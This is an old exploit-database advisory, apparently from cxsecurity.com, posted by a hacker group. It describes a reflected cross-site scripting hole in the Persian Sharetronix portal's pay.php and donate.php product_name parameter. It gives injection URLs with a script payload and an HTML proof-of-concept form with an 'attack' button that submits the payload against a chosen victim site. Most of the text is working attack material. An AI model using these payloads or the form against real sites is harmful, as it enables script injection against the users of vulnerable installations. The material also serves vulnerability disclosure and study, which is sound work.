Persian Sharetronix Portal Cross Site Scripting

2011.08.06
Credit: kurdish hackers team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

=========================================================== Persian Sharetronix portal Cross Site Scripting Vulnerability ----------------------------------------------------------- foun by :kurdish hackers team group : kurd-team contact : pshela@yahoo.com site : kurdteam.org ----------------------------------------------------------- ------------------------script----------------------------- ----------------------------------------------------------- script name: Persian Sharetronix download: http://donbaler.com/i/upload/2/1311602963.zip ----------------------------------------------------------- Exploit: -------- Exmple: ------- ww.site /tools/pay.php?product_name="><script>alert(888)</script> www.site /tools/donate.php?product_name="><script>alert(888)</script> --------------------------------------------- PoC: --------------------------------------------- <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1254"> <title>BY KURD-TEAM</title> <script language="JavaScript"> function it(){ xpl.action= xpl.victim.value+xpl.path.value+xpl.file.value+xpl.xss.value;xpl.submit(); } </script> </head> <body bgcolor="#000000"> <div id="footer"> <div class="left"> <a title="Persian Sharetronix ? &#1608;&#1576;&#1604;&#1575;&#1711;" href="http://sharetronix.ir/blog"> <span style="text-decoration: none"><font size="4" color="#FF3300"> Persian Sharetronix</font><font size="4"></font></span></a><font size="4" color="#FF3300"> portal Cross Site Scripting Vulnerability</font></div> </div> <p align="left"><font color="#0000FF">-----------------------------------</font></p> <form method="post" name="xpl" onSubmit="it();"> <p align="left"> <font size="2" face="Tahoma"> <font color="#FFFFFF">victim:</font> <input type="text" name="victim" size="33";" style="color: #FFFFFF; background-color: #000000" value="http://donbaler.net"> <font color="#FFFFFF">path:</font> <input type="text" name="path" size="20";" style="color: #FFFFFF; background-color: #000000" value="/tools/"><font color="#FFFFFF"> file: </font> <input type="text" name="file" size="28";" style="color: #FFFFFF; background-color: #000000" value="pay.php?product_name="> </font> </p> <p align="left"> <font size="2" face="Tahoma"> <font color="#FFFFFF">XSS:</font> <input type="text" name="xss" size="34";" style="color: #FFFFFF; background-color: #000000" value="&quot;&gt;&lt;script&gt;alert(888)&lt;/script&gt;"> </p> </p> <center> </p> <p><input type="submit" value="attack" name="B1" style="float: left"><input type="reset" value="reset" name="B2" style="float: left"></p> </form> <p><br> </p> </center> <font color="#0000FF">------------------------------------------</font></body></body> </html> --------------------------------------------------------------------------- Zryan_kurd , AhMaD-HaWLeRY


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top